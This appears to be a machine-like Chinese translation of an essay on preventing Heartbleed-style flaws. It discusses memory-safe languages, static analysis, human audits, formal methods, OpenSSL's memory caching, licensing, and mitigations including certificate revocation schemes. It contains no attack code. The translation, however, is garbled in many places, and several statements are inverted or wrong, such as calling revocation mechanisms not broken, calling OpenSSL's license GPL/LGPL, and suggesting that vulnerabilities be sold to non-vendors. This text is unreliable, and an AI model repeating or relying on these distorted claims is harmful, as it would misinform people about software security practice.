心脏出血漏洞产生的原因是C语言不包含有任何的内部检测或是方法来对抗缓冲区不当的限制。不恰当的限制会导致灾难性的问题，所以几乎所有其他的编程语言都会自动对抗不正当的限制。

如果在一个给定的程序中的漏洞可以造成灾难性的影响，那么选择它的程序语言时更应该减少漏洞存在的可能性。越是灾难性的影响，就越要有更好的表现。大多数的程序语言提供对其他危险漏洞的保护措施，如不恰当的限制保护。某些程序语言有更小的可能性出现被误用和不正确使用的结构。理想情况下，一种语言将会阻止所有漏洞。通用的语言都不能阻止所有的漏洞，但是它是编程者争取的一个目标。没有“绝对安全”的程序语言；它是一个继续发展的事物，一些语言提供了更多的对策。

3.8.1 危险语言和为什么使用他们

最广泛使用的与安全有关的软件有C，C + +和Objective-C。所有的这些语言都没有提供缓冲区的访问限制，实际上，它要通过努力来限制缓冲区读和写溢出的出现。对缓冲区访问的不恰当的限制会被广泛使用类型的灾难性的影响漏洞。使用或是转变成其他的语言将会消除缓冲区的漏洞，包括心脏出血漏洞。C语言更是这样，因为它缺乏很多可以避免缓冲区出现问题的高级结构。大多数语言也可以防止内存释放错误，可能会导致安全漏洞，以及一些语言也会被设计成对抗其他漏洞。其中在现在系统中有很多漏洞的原因之一是C、C++、和Objective-C语言的过度使用。实际上，有人提出禁止在安全性敏感的代码中使用这些语言。

C、C++、和Objective-C语言的广泛使用是有原因的。在TIOBE编程区域指数来衡量的编程语言的流行，2014年4月占到了使用人数的前四。这些原因包括更高的性能和界面简单，大型的存储，更好的表现，熟悉性。此外，把语言转变成大型程序是需要很大的努力。让我们来看看原因。

3.8.2 替代产品的运行速度和内存性能

一个经常被引用的问题是使用C,C++,和Objective-C比其他的程序的运行速度快。此外，当要和硬件连接时，其他语言就会缺乏最底层的机制。如果你要很快的速度，你可以直接连接，语言列表中的运行时间会更短。运行速度直接决定着移动设备和服务器领域。基准游戏中速度分析程序是使用不同的语言编写的。“程序语言编程的大致等级”中说到，发送数据和不同语言的包是根据他们的大致速度来实现。没有完美的基准，它始终是一个最好的衡量绩效的具体方法。不过，我更喜欢数字的大致猜测，这个数据即足够代表开始。如果性能是你要追求的，你不想使用汇编语言，可以考虑下下面的分析：

Fortran。Fortran的应用表现经常要比其他的语言好，尤其是在数值计算上。但是，我不清楚很多人会把很多的代码转变成更原始的编程语言。特别是据我所知，即使是现代Fortran也没有和低级的硬件的接口的标准机制。

Ada。Ada用于真实时间系统的应用，因此，它会有更好的性能，包括访问底层的组件。Ada可以用于对抗错误，在编译时表现的最好，它的语法是专门用于对付错误的，Ada一定能对抗缓冲区的心脏出血漏洞。很多人都不喜欢像Ada一样的语言，因为Ada要很严格的静态类型检查，但是这中检查是发现缺陷的关键机制之一。Ada一般广泛的应用在像航空铁路等这些高保障的地方。

ATS。这不是一种众所周知的广泛使用的编程语言，但是它确实非常成功的应用在特定的基准测试套件上。我要指出ATS不在最近使用的程序列表上。

还有很多其他的编程语言，特别当你愿意放弃由基准确定的速度时。例如Go的性能就很好。Rust是另一种你可以考虑的程序语言。Java在当前的JITs上有很合理的表现，一旦它运行起来，但是这有个一个特别的启动时间。其他的语言在基准下也很有用，如Scala，Free Pascal，Lisp SBCL，Haskell, C# on Mono, F# on Mono, and OCaml。不论是D编程语言还是Nimrod语言都列出了相应的标杆。但是使用他们时也要考虑到效率问题。

当然，如果速度不是关键，很多的软件都能被使用。一个研究表明，用.NET, Java, ASP, PHP, Cold Fusion和Perl来编写的程序中的静态漏洞没有统计学上差异。所有这语言要比C,C++或是Objective-C安全。因此所有人都可以防止缓存溢出的问题。

这有太多的编程语言可以使用，我就在这多说了点。我的目的不是列出说所有可以替代的编程语言，而是让人们知道是有替代的存在。

性能不单单是速度，还有内存的管理。在移动设备上尤为重要。C, C++和Objective-C没有自动垃圾收集器，但是其他的语言有这个功能。开发人员如果不考虑内存管理时，他们考虑的是效率，但是在很多的环境下是不现实的。Drew Crawford对移动设备的发展做了很长时间的研究，他指出“如果你需要至少6倍的内存，自动垃圾收集工作会很管用，但是如果这里少于4倍的内存，会减少效率。”iOS基于人工操作的大多数事情的文化，并且试图让编译器做一些简单的东西。Android基于他们努力不在实践中应用垃圾收集器工作，但是不论哪种方式，当他们编写移动应用程序时，每个人都花了很多时间考虑内存管理。内存是不可以替代的。OS X Mountain Lion v10.8中废弃了自动垃圾收集器，在以后的版本中会把它删除。都推荐使用自动引用算法。不是像OS X和iOS一样。这就是人们选择C, C++,和Objective-C的原因。

C, C++, 和 Objective-C编写的程序比其他的语言的运行性能好吗？回答就是语言就被设计成这样。特别是C语言编写的程序能够快速的运行并且使用很少的内存；C语言中指出C的关键是“相信程序员”，“许多操作被定义为如何在目标机器的硬件上使用它”。另外，C的模型是透明的，所以C或是C++开发人员可以使用它，通常评估一个结构。当然，现实会有很大的差距；大量优化的编译器和运行时间要比一般的情况下有更好的性能。

很多的开发者选择C, C++,或是Objective-C来简化其他组件的接口。许多工具都有C的接口，大多数语言的基础设施都可以通过C语言的库。然而，许多其他的编程语言都有C的接口，两种方法为C路径和其他系统通过接口来调用。因此，这并不重要，重要的理由是选择哪种语言。

当使用C, C++,和Objective-C的开发人员使用这些语言时可以减少使用库的危险。最新的C标准还增加了一些安全功能，尤其是那些对字符段的处理。C标准仍然错误的提供易于使用动态调整大小函数的asprintf()或是类似的函数。但是很多现在的系统使用asprintf()。C语言也可以使用GString类型的glib库，strlcpy/strlcat提供，或是其他解决问题中的一个。C++程序可以使用std::string或是它的类似内容。类似，Objective-C具有NSString和NSMutableString类。但是这些设施只能在一定程度上降低风险；即使使用了这些设备犯了错误。

你可以用什么语言来写不安全软件。例如，SQL注入的漏洞是另一个普通弱点，而这可能使用每种语言。然而，大多数语言提供的易于使用，和避免发生问题的机制。我要很小心的使用这个机制…但是对C, Java,和其他语言来说的。

有些语言通常是通过计数器缓冲区溢出，让你暂时停止保护逃逸机制。这些逃逸机制很容易发现和与精心写的代码隔离开来。他们把不安全的隔离成很小的部分，从而降低风险。在很多情况下，你可以重新实现内存缓冲区高速缓存；你可以启动一些漏洞即使缓冲区存在保护时。但是这种重新实现是明显的，在很多的语言中，人们必须要努力避免缓冲区溢出问题。与其相反的是，在C, C++, 和 Objective-C里，你必须做一些附加的工作来避免这种问题。

创建安全软件时，也会遇到一些附加的挑战。我知道没有办法安全的擦除Java里的数据。这是因为Java里没有.NET的SecureString的功能；由于内存分配和垃圾收集器怎么实现多次拷贝，Java的结构是在结束在内存中。这不是Java的特点，很难安全擦除数据在多种语言中。但是Java中，它可以比较容易通过建立一个小的非Java模块来擦除一些数值；该程序的其余部分仍然受到保护不会出现缓冲溢出。此外，利用额外的内存拷贝需要访问大量的程序和运行环境。安全擦除往往是一个有用的减少损伤的措施。相比之下，缓冲区溢出有时候可以直接减少可以利用的连接，有时只要通过网络连接。一般情况下，缓冲区溢出要比大多数其他语言带来的问题更危险。

这很难使用C, C++, 和 Objective-C来编写安全软件。大多数的语言都可以内嵌和防止缓冲区溢出保护…但是C, C++, 和Objective-C例外。另一方面，他们使用这种原因。

开始运行每一个新的安全相关程序，就要仔细的考虑下程序语言。选择一个更安全的语言是很有必要的，这样就可以去除潜在的安全漏洞，其中包括缓冲区溢出的心脏出血漏洞。另外，计算机变得更加强大，在很多情况下可以进行交易一些性能。更重要的是，在开始编写新的程序时，使用另外一种编程语言就几乎变成了零成本。我相信用不太安全的语言时，和重写代码需要花费很多努力。但是，使用几乎任何不是C, C++,或是Objective-C，至少会消除缓冲区溢出和缓冲区溢出漏洞会有很大的影响。

我已经确定了更安全的语言作为一个更复杂的方法，因为切换一个不常用的程序，用不同的语言来实现安全是要花费很多的时间的。

3.8 完全静态分析器

一个完全的静态分析器可以被称为声音静态分析器，用来发现某个特定的漏洞。创建这些类型的工具就是在调整C语言。然而，程序有时不得不限制他们使用的架构，并且开发人员必须提供附加的注解资料。因为这些工具集中发现一切问题，他们往往会报告不存在漏洞，这就必须要分析决定是否真的存在漏洞。但是，如果它应对所有的漏洞，权衡是很有必要的。

3.9 完全认为的核对

一个完全彻底不独立的人为软件检查，主要集中在确保安全性和发现漏洞，这是发现漏洞的最佳方式。这些评论又被称为审核，在展示时，这个软件是很脆弱的。

它的观念是通过人为审核要比通过工具的启发式技术来查找漏洞更直观。更重要是实验数据证实了这一点。例如，Kupsch和Miller发现使用第一原理弱点评估方式的人为审计分析一个示例程序比使用Coverity Prevent和Fortify Source Code Analyzer更全面。人为审核也会出现意外，但是这样的评估会做的相当不错。在Kupsch实验室，FPVA人为检查发现了15个严重的安全漏洞；Fortify发现了6个，Coverity发现了1个，既不是自动化工具发现也不是由人的审查发现。

但是人工核查的缺点也是显而易见的：这需要努力和专业知识来做这样的审核，改变也要审核。人为审查不适合用于所有的软件，甚至当它在面临很复杂的情况时。

请注意，这种审核和以前的可以接受的典型的、简单的回顾是不同的。心脏出血漏洞是试图避免漏洞开发人员发现的，被另一个审核接受。然而，补丁的审核通常是是功能的改善和寻找安全漏洞的过程，所以很容易让他们错过漏洞。正如前面提到的，人为审查每个补丁来要求每个领域的有效认证，要抓住这点…但是现在代码的存在，只是审核新的补丁是不够的。试图在这一点上单独审查每一份文件的补丁可能是不符合成本效应的。此外，补丁的审核可能错过重要问题。一个单独的审核关注整个系统的漏洞是很有效的。

这种审核确实可以发现。事实上，在心脏出血漏洞被发现的同时，TrueCrypt的一个重要组成部分的安全审查发布了。

在很多情况下软件应该进行修改和简化，在审查之前。我认为对于OpenSSL是尤其重要的。那些复杂的程序都很难为工具和人为的评估。OpenSSL使用的复杂结构，这就让它很难被人和机器发现。

3.10格式化方法

但是如果你真的想在某种程度上肯定什么是这个程序要做的？存在着一系列的方法叫做“格式化方法”，这要比上面列出的技术方法更有信心。格式化的方法包括使用“严格的数学技术和工具来规范、设计和验证软件和硬件系统。”由于使用格式化方法是有困难的，他们更可能是在目前的小程序和模块上，是绝对可以使用格式化方法的。此外，如果你真的想要拥有很高的信任程序，格式化的方法仍然是实现这一信心的唯一途径。

这有很多方面可以使用格式化方法。有些人只用格式化的方法来创建规范，不会使用格式化的方法来多做什么。有些人可能会想的多一点，证明有关规范的一些声明或是改进的规范走向更具体的模型。这些方法都不会发现心脏出血漏洞。对于心脏出血漏洞来说，格式化方法要创造关于代码的证明，在源代码和可执行代码水平上，这就是我最关心的。

在关于有关代码注释的系统的实践证明，值得一提的是，注解系统通常可以在各种不同的方式来使用简化的证明。为了了解更多的信息，请参见我有关注释系统的评论。

如果你对更多的感兴趣，特别是支持格式化的FLOSS工具，请参阅从我的类的格式化方法来开发安全的软件。一个有趣的格式化方法工具套件是Toccata，它结合了Frama-C和Why3，以及许多自动化和互助工具。通过组合这些不同的工具来证明程序的正确，在比以前使用更少的努力。更重要的是，他们可以处理C的大量子集；而最正规的方法是不能做到的。SPARK 2014就是基于Ada的，但是可以让你证明相关程序的声明，以及他们最近和Toccata联系在了一起。

正式验证程序的实例中有seL4，CompCert C，cakeML，Tokeneer和iFACTS。

四、前提条件

很多的技术有重要的先决条件；让我们来讨论下。

4.1 在没有特别要求时内存分配

许多静态技术可以对抗心脏出血漏洞的缺陷，包括使用人工核查来对抗，因为OpenSSL的代码很复杂。代码只有简单了才能安全。

许多安全软件开发者首先使用“软件质量”工具来检测特别复杂的结构，然后简化这些结构，这就是安全软件的产生过程。理想的静态分析方法由于代码复杂和变得困难，实用工具来检测这些代码的复杂性，简化他们，在使用静态分析方法就变得很有效。我认为他们是对的，但是我没有发现可以支持他们的数据。因此，这似乎是一个合理的想法，但是我很希望有人最终将创建并发布一些科学研究来支持和反驳这个假设。

在任何情况下，简化的代码是超过运行工具软件的。这是一种心态，应该要有不断的努力来简化代码，不然增加运行能力就会增加软件的复杂性。代码的重构要使它变的更简单和清晰，不是不断的增加新的功能。我们的目标是代码是对的，而不是代码很复杂我们看不出问题。

过于复杂的代码通常会导致安全漏洞。2006年Debian意外事件通过修改软件来消除valgrind警告来打破OpenSSL的随机数生成器。但是，修改软件的人并不真正的了解它。那个人要求帮助，但是OpenSSL的代码复杂就很难使人找到改变后的漏洞。Cox通过研究发生并得到了以下的结论：“尽量不写偷懒的代码，写井井有条的代码。你会不可避免的写一些偷懒没有组织的代码。如果有人问到这这个问题，就把它作为代码不够好的标志。重新把它变得更简单和容易理解。”

LibreSSL的开发者使用了OpenSSL代码和专心用来简化代码。LibreSSL-一个OpenSSL的变版，介绍OpenSSL代码库的一些问题。他们正在做许多的明智的事，如去掉代码支持过时的VAX VMS系统。然而，他们删除了人们关心的代码。例如，他们去除美国政府使用的FIPS 140-2的认证，这同时也受到了许多民营企业的支持。在使代码变得简单和使代码在很多的环境中都有效之间存在着冲突，最简单的代码不能实现什么。很显然，许多程序可以变得比现在简单。

4.2 简化应用程序接口

虽然这稍微的超出了本文的范围，一个相关的问题就是应用程序接口一般情况下都比较复杂。

大多数加密库和数据传输库都是很复杂的，他们通常呈现给开发者一个“困惑矩阵的选项和设置”，因此，大量的应用程序和高层次的库使用不正确的库来进行加密，导致了系统的漏洞。大都数的问题在浏览器中工作中出现，但是他们在其他的代码上仍然是一个问题。想要了解更多的信息，请看“最危险的代码世界：在非浏览器软件中验证SSL证书。”

尽管这在SSL/TLS的使用中是一个技术而不是一个漏洞，但是他们是无关的。加密程序库是创建的复杂接口的一个组件，所以，它仍然是一个故障组件，简化代码。

一个相关问题是底层库和建立在API加密库的系统的很难使用。C忽略了像asprintf和reallocarray等功能。因此，程序员必须要解决这些漏洞，但是他们的解决方法常常会出现bug，这些bug会导致漏洞。

4.3 分配和释放内存

安全的程序必须正常的分配和释放内存，没有特别的分配系统和内存缓存系统。至少，它应该很容易禁用和测试它们来确保禁用了他们的程序。一些技术会减轻心脏出血漏洞的出现，因为OpenSSL的内存分配方式。

基本问题是OpenSSL包括未分配的内存的应用程序特定的缓存空间。目的就是要加快分配在相同数量的重复指令。在默认情况下，OpenSSL正常分配内存，但是在内存区域没有被使用时是不会解除分配的，在很多情况下，把该区域变成未使用的区域变成空闲的，来使它可以立刻重启。这个缓存列表颠覆了一些操作系统和C的运行的一些的机制，因为他们并不是总得到通知在内存不使用时。

Theo de Raadt提到：“几年前我们增加利用措施到libc malloc和mmap，这样一来更多的bugs就会暴露出来。这种存储器会导致死机，甚至是核心的崩溃。分析这些bug，之后永久的维护系统。其他的调试工具也会达到这个目的。在很大的程度上说，这基本就没有性能上的损失。但是在那个时候OpenSSL添加了malloc & free的封装，使库存在缓存中。因为一些平台的性能下降，甚至如果你建立防护技术引入malloc() 和free()，这就无效了。在所有平台上，由于选项是默认的，并且Ted的测试表明你不能关掉它。因为他们没有测试它的年龄。所以后来的bug显示了在该层的内存的泄漏内容。如果内存通过free得到了恰当的返回，这就可能被munmap捕捉到，并激发保护程序的崩溃而不是泄漏你的密码。”

似乎有很多在什么地方出来问题的困惑和OpenSSL的内存分配方法，Chris Rohlf取得了一些有益的验证。我觉得这些验证是很重要的，因为我们必须先用理解这个问题在我们修护它之前。特别是Rohlf指出OpenSSL使用的是标准的malloc() C内存分配方式，当它需要一个全新的内存块时。问题是一旦一个内存块被分配，OpenSSL自身还在自身的管理存储器。Rohlf也指出在很多的环境下是与空闲列表是无关的；一个空闲列表把不同的内存分配在了一起，但是许多典型的内存分配系统也提出了不同的内存分配。然而，Rohlf的典型的内存分配的应用来做同样的事是绝对正确的，关键是OpenSSL的实现阻碍了各种缓解措施。关于OpenSSL的内存分配系统有另一个问题，但是我们首先要介绍下一些基本知识。

一般的方法就是处理一些内存的分配和释放特例，我们的想法就是缓存和重新对某些对象和缓存器在他们没有被使用时，这中方法可以显著的提高性能。这种方法的具体例子包括专门处理共同的内存分配的大小，或是用未使用的高速缓存来重新使用对象和内存器。有一些具体的技术来做这些，包括创建一个对象池和一个slab分配器。Glib库包括一个称为记忆切片的机制，提高内存的分配性能。许多图形用户界面和程序在使用这些方法时，是没有安全感的。

事实证明，一些方法可以不用解决一些检测工具如address sanitizer和使用保护页系统。特别是使用fuzz测试的问题，如果这些工具不被禁用，则fuzz测试就会变得没有效果了。的确，fuzz测试可能不能检测到许多超出范围的读操作，在使用这些方法时。

关于OpenSSL的报告指出OpenSSL的使用是自我管理的一个交大的内存区域的方法然后在进一步细化。这是一个使用slab分配器或是储存器切片时要发生的。使用这个方法就是想要提高性能，在这些情况下使用address sanitizer和保护页系统来抑制检测完全的读溢出。旧的版本称这要发生什么。但是我已经钻研了更多的OpenSSL代码，而这似乎并没有在OpenSSL中的真实性。这对于心脏出血漏洞来说是个好消息。尽管如此，这些类型的分配方案是比较常见的，而且我知道没有人说道这些方法的风险。

安全性软件必须要避免使用内存缓存系统，尤其是那些与一种分配机制联合在一起形成一个分配请求。如果不是这样的话，他们至少提供一个简单的证据机制来禁用它们，并要使用该机制作为其回归测试套件的一部分。OpenSSL有一个禁用机制，但是不再被使用，并且在任何情况下很少有人能了解这种机制，它可以禁用安全分析工具的很多工程。

我们还需要修改我们的教育材料，是开发人员和测试人员都知道内存缓存系统会严重妨碍安全分析。在我的演讲中我已经提出了一些材料来开发安全软件，其他人员也一样需要。

从长远来看，这或许应该是使用C的标准接口在freelists缓存/ slab分配器。如果有标准的接口，你们工具可以很容易的修改和自动调解他们。

4.4 使用标准的FLOSS许可证

这是我的推测，我相信如果OpenSSL使用标准的推广的许可证来进行代码审核会有更多的贡献发生。OpenSSL使用的奇怪的变量许可证是GPL和LGPL。因为GPL是一个最常见的FLOSS许可证。在很多情况下这种不相容性是通过围绕一个许可证漏洞的，或是使用许可证除了在软件中通过使用OpenSSL。不过这个诡异的证书意味着很多人更喜欢GPL或LGPL会情不自禁的禁止或是审核OpenSSL。一些人喜欢限制较少的许可证，这些也有很少的帮助，这不是一个标准的证书。

我确实有一些证据表明非标准证书是一个问题。一个完全独立的软件包GnuTLS在最初是专门创建的。因此使用标准GPL许可证的软件能够轻易的使用SSL/TLS。OpenSSL的LibreSSL转变成了2-clause BSD许可证，当他们写了新的代码，相比与OpenSSL许可证。

在很长的一段时间了，广泛的使用FLOSS证书对FLOSS项目来说是很重要的。1999年Bruce Perens指出：“如果使用这里被列出的一个，就不用写新的许可证了。”后来Open Source Initiative创建了License Proliferation Project，指出许多许可证“和其他开源代码的许可证是不兼容的，严重的限制了开发人员的方法，开发人员仅仅是扩大开源软件的创新方式。”一个重要结果是OSI直接列出了开源代码许可证的页面，只是Popular Licenses，这是“流行，广泛使用，或是强大的社区。”

大多数的FLOSS是基于GPL, LGPL, MIT/X, Revised BSD，BSD 2-Clause或是Apache 2.0 licenses。我建议限制FLOSS程序的许可证列表。你可以添加一些；在OSI的流行许可名单包括更多。然而，这里的问题是OpenSSL许可证根本就不是一个公共无可证。更重要的是它是一个广泛使用的不兼容的许可证的非标准证书。如果可能的话，最好用一般通用的许可证代替。

五、什么会减少心脏出血漏洞的影响？

什么能减少心脏出血漏洞的影响或是完全消除？毕竟当漏洞出现，你想减少影响。下面有一些方法。

5.1 一旦标准内存分配器被替代，启用内存分配器的防御。

许多系统包括减少损坏的内存分配机制，有的有时可以发现问题。这不能对抗问题，但是能够减少影响，例如：

一个常见的方法就是内存在分配和释放时零出，这就意味着如果数据显示，这不太可能是有趣的事。

在2014.4.29，David Wagner提出了一个有趣的选择：“使用一个特定的内存分配器，它能够给每个对象一个随机的地址。在一个64位系统上，会有一个48位的地址空间，这一切都在离分配对象远的地方，这个心脏出血漏洞不会透露任何其他对象的信息。这可以被纳入标准内存分配器。注明:我不主张这么做，我不是说这是最好的防御，我只是回应你的要求想法来阻止它。”

OpenBSD的malloc支持保护页，如前所述。特别是它的G和P选项可以减少和防止信息的泄漏。不幸的是很多的流行malloc不包括这个功能。

5.2 覆盖了你他们一起做的关键信息

关键信息包括密码和私有加密密钥。可以肯定这不是被优化掉的，大多数的编译器将会消除这种覆盖，如果你不能避免的话。

5.3 使用默认的加密方法来做完美的安全

一个加密系统有完善的保密，当它的非确定性生成器生成一个随机的公钥。当PFS启用，当一些密码暴露时，信息不一定会暴露。因为没有用于所有信息没有单一的密码值。

5.4 使用权限分离来达到分离关键密码的作用

它可以帮助从其余的代码中分离加密代码出来，于是即使余下的程序被覆盖，它也不能直接访问私密的密码。

这就会使用到基本的安全原则上，程序要提供最大限度的私密权利对于他们的工作。这些方法可以通过减少漏洞，如密钥等关键信息的软件的数量，从而减少漏洞的数量和影响。不过，我要列出一个减少风险的方法，不是作为一个完整的对错。某个地方的代码必须有提供访问权限的数据，并且这些代码可能有漏洞。这里有些其他的注意事项：

David Wagner指出了这一点，并且进一步解释说：“RSA私钥可能已经被移动到另一个单独的过程，只有运行私有密码代码就会转移到这个过程。在Intel系统中，OpenSSL可以使用采用SGX来运行所有的加密计算在独立的沙盒执行环境下。这被认为是在软件加密模块下的，如虚拟TPM，虚拟HSM等。SGX提供了分离关键代码的硬件支持，但是可以使用其他的机制来代替SGX，像进程隔离或是沙箱。有很多的学术著作上保持这加密代码分离的方法，以及一些考虑到了OpenSSL的特别性。” Rutkowska2013里有关于SGX的介绍，在Brumley里有应用OpenSSL的权限分离的讨论。

Peter Neumann指出在硬件的基础上，沙箱和fine-grained访问控制也会提供强有力的机制来限制权限，从而控制心脏出血漏洞。

一个学生在我的开发安全软件的课上建议内存在服务器上隔离每个用户。这是一个很有趣的想法。

5.5 修复SSL/TLS证书的基础设施，尤其是对证书的吊销。

完整的SSL/TLS的基础设施有很多的问题，包括不值得信任的根证书权限，不良的审核证书和严重损坏的证书吊销过程。作为一个关联点，Qualsys SSL实验室发布了SSL威胁模型。

在目前而言，让我们特别关注证书吊销的过程，在对心脏出血漏洞的回应时，这是被特别的关注的。心脏出血漏洞使人们有可能为攻击者遗漏私密为他们的证书，这是很糟糕的。理论上，漏洞网址可以部署新的证书和撤销旧的证书来解决私密的曝光。不幸的是，今天的证书吊销机制在根本上没有被打破，少数人会很重视这个问题。因此，今天的攻击者往往会导致网页浏览器来接受他们的证书被撤销。有一个迫切的需要推动这方面的工作，远远超过目前可以使用的机制，更好的创造安全标准，并实现它们爱默认情况下无处不在。我认为应该有一个确定推动X509 OCSP的必备，但解决方法会证明这是我们需要的。

这是一个很复杂的区域，我会总结这些问题，这里有几个证书撤销的机制，和使用他们的问题：

证书吊销列表。证书吊销列表是一个吊销证书的大文件。这是最原始的撤销做法。当时的想法是一个程序会下载并检查证书吊销列表在接受证书之前。但是证书吊销列表尚未缩减到今天网络的要求，今天的证书吊销列表是很大的，要频繁的下载更新来保持目前的列表，使他们越来越不和实际。人们已经逐渐远离证书吊销列表，如Firefox 24变成了自动更新证书吊销列表和用户导入证书吊销列表的接口。

在线证书协议。在这个方法中，程序可以与服务器连接来请求特定证书的状态。在线证书协议应该比证书吊销列表需要更少的网络宽度，接近实时的状态检查。然而，在线证书协议创造了巨大的体积和证书发送机构的响应时间要求，因为他们现在必须提供对应所有客户端在一个真实的时间。在线证书协议也要创建了一个严重的隐私问题：它会导致客户透露给CA，它与客户正在联系。另外，不论在线证书协议和证书吊销列表有一个根本性的问题：如果你不能找到答案会出现什么？在实践中，实现线证书协议和证书吊销列表的系统都默认软件连接失败，也就是说，他们接受证书，在他们没有找到其他的东西。但是软故障使得整个方法没有用，因为攻击者往往可以干扰或去掉这些要求。硬故障时可以正常的工作，和其他人说它也可以为他们工作。然而，切换到硬件故障确实有其自身的严重问题。这个附加的检查减慢了到安全网站的连接，并且很多用户对这个额外的时间很敏感。在线证书协议服务器的故障是很常见的，在连接到网络受到制约的地方时你要暂时不用这个，如果硬故障被广泛使用，之后攻击者可以通过短暂的在线证书协议服务器连接来禁止HTTPS。攻击者甚至可以使用在线证书协议封装，包括已经吊销证书的在线证书协议响应，挫败了Langley2014a和Langley2014b的检查。

在线证书协议封装。在线证书协议封装试图通过让证书者来查询在线证书协议服务器，不是最终的用户和得到一个签名的时间的反应，是在有效的时间里解决在线证书协议的问题。当客户端随后访问这个网站时，他们会从该网站获得证书和一个附加的封装时间。如果没有收到封装响应，那么客户端可以回退到另一个方法，如标准的在线证书协议。这不是广泛部署的在线证书协议和证书吊销列表，但是一些网络服务器和网络浏览器都支持在线证书协议装订。然而在线证书协议封装本身仍然容易受到攻击过滤；在很多情况下，攻击者可以去除装订的响应，并阻止客户端获得在线证书协议服务器。在这种情况下，在浏览器中的正常的软失效过程中导致整个系统失效。

证书吊销列表设置。证书吊销列表设置是建立在网络浏览器的短暂的证书吊销列表。例如Chrome浏览器开发人员编译了一天列表，他们认为是“高价值吊销”和使用Chrome的自动更新机制，使这个列表推送到Chrome的安装。Adam Langley，一个谷歌的专家，提倡使用证书吊销列表设置机制，而不是证书吊销列表和在线证书协议。我同意证书吊销列表设置可能是有用的，当一个网络浏览器强行撤销广泛使用的网站证书。但是总体而言，我认为证书吊销列表设置正在从根本上被打破。一个证书吊销列表设置就是一个不完全的黑名单。Langley指出，一个证书吊销列表设置是不完全的，也没有达到足以应付大量的撤销…希望使用证书吊销列表设置，那样我们就能够把撤销的变成重要的和行政的并推动重要的…可悲是，这没有发生。Gibson有一个正确的观点，他指出“互联网证书吊销列表列举出超过两百万撤销和不信任的证书。不过Chrome的证书吊销列表设置目前列出了约24000的吊销证书。两百万中另一种隐式的别Chrome信任。”证书颁发机构安理会已经强烈反对证书吊销列表设置机制作为唯一的证书撤销机制：“心脏出血漏洞是完美典范为什么撤销的是很重要的，即使没有确定的关键妥协。没有人可以肯定的说，他们的服务器的私密被攻击了。大多数撤销正在进行证书吊销列表为“商业原因”，而不是提到证书吊销列表设置。这里很清楚的认为证书吊销列表设置只是一个简单的吊销证书的黑名单。”其他浏览器也有类似的黑名单，而这些可以有效的时间。但是他们不能替代在线证书协议的检查…即使撤销在线证书协议的检查不是100%的准确的。它仍然可以保护用户的比例…关闭撤销检查对每个人来说都是没有保护的。只是要清楚，我不认为证书吊销列表或是在线证书协议运行的良好，我同意证书吊销列表设置可以有一定的效果，尤其是当有一个特定的高调网站证书被曝光。然而，像心脏出血漏洞是不同的，在心脏出血漏洞中，如果他们的私有密钥时网页不能确认被排除了，所以他们需要撤销他们只是确定的…而且由于OpenSSL被广泛的使用，这会硬性到很多的网站。证书吊销列表设置不能解决心脏出血漏洞的问题。

必备的HTTP头文件。Firefox计划实施一个新的必备HTTP头文件，知道像X.509 OCSP等更好的机制必须封装起来便的可用。这只是增加了一个新的HTTP头文件作为一个HTTPS的连接请求的一部分。如果这个新的头文件是有服务器提供的并且支持浏览器，浏览器将会需要一个封装在线证书协议在该域以及子域。再次，如果这是客户端第一次被访问攻击者就可以颠覆这个了，因为攻击者仍然可以伪造初始连接。有些人混淆了用X.509 OCSP主封装HTTP头文件的方法，他们不是一样的。

短暂的证书。一种解决方案是部署只能持续很短时间的证书，如，几天而不是年为单位。从理论上讲这就要在今天工作；到期时间是有效测试证书的基础。不过这可能不是扩展，许多系统假设证书的有效期是很长的时间，并且额外的CA的工作可能很容易犯错误。许多的用户使用过期的证书并且忽略了他们的警告。最后，许多机制可以对抗其他证书的问题通过假设的证书很少的改变，所以这些修复能够增加漏洞。

X.509 OCSP 必备的封装。在这种方法中，该证书具有一个标记，表示该用户端必须要接接OCSP封装，然后OCSP封装被广泛使用。这是一个附加的OCSP封装，但是它可以防止攻击者筛选OCSP封装，因为客户知道什么是错误的。请注意这不只是封装OCSP，这不是一个必要的封装HTTP头文件，人们有时会混淆这些不同的方法。不像必须封装的HTTP头文件的方法，攻击者无法轻易筛选出这一点，因为证书本身指出需要封装。这中方法对短寿命的证书同样有效果，就不会有这些问题。Langley, CASC和其他的公司都推荐使用OCSP必备封装。然而虽然有必须的封装，这没有正式的规范并且这种扩展不被广泛使用。对于这个工作我们需要一个正式的规范，在服务器和浏览器中广泛的使用包括扩展的X.509证书包。

其他方法。还有其他的方法，尽量处理犯罪嫌疑人的证书，包括TACK和Mutually Endorsing CA结构。再次这些没有被广泛的使用和接受。

5.6 使软件容易更新

问题将会发生，组织者必须在必要的时候修复他们。如旧的Android 4.1.4就容易受到心脏出血漏洞的攻击。这是因为Google虽然很快的修复了这个版本，但是手机的制造商很慢的更新手机，手机运行商通常会推迟更新的时间。也到了谈论制造商和运营商不能修复手机的问题，当有安全漏洞要修复时，运行商已经即时的出售了手机。同样，我认为通过FIPS 140-2验证过程需要改变，以便库中的漏洞被发现和更新。

5.7 存储散列的密码

当然，继续把散列的数值作为密码，而不是明文或是可逆值，如果要存储密码为明文或是可逆的值，你没有说服人的理由，你就不能使用。

5.8 一般问题：安全软件教育/培训和减少攻击者的攻击

我要提到各方面的改善可能会减少一般可利用的漏洞的数量，有时利用这些。这就包括安全软件教育/培训并且要减少攻击者的攻击。

很多的软件开发人员依然没有受过什么教育和培训来开发软件。然而，几乎所有的软件可以直接连接到网络上，或是可以通过一个网络接收数据。许多开发人员不知道如何设计软件来对抗攻击，一般的漏洞是什么，和如何正确的对抗。事实上，很多开发人员不知道安全软件和软件安全的区别。这些材料是可用的，我在一本书上写了如何开发安全软件，开发人员必须要学习和运用这些知识。

我们也需要减少经济效益的攻击，经济激励会使人们发现漏洞并要出售给攻击者。在很多情况下人们不会把漏洞告诉防御者，他们可以通过出售这些漏洞给攻击者来得到很多的钱。毕竟人们可以通过出售一个单一的漏洞来合理的挣到100万。赏金根本跟不上当时的情形，我们需要探讨如何减少这些诱惑。例如也许我们应该把漏洞信息卖给不是供应商和政府的人定罪。基本上对于漏洞信息的捐献：有意的消除经济引诱在一个特定的区域来获得一个更好的社会。我认为这不可能防止公民来告诉他的国家软件的漏洞；公民必须把这作为他们的职责。我觉得没有一个政府会禁止购买这些信息。但是额外的限制可能会减少人们积极寻找漏洞，不是修复而是利用他们。显然有一些人会做违法的事，但是有些人会避免做违法的事，这是因为他们怕被捉到。你并不需要停止所有可能，只是改变。也许有更好的办法，如果有的话，请提前说，在任何情况下，我们需要找到一个方法来做物质的工作和不是安全。

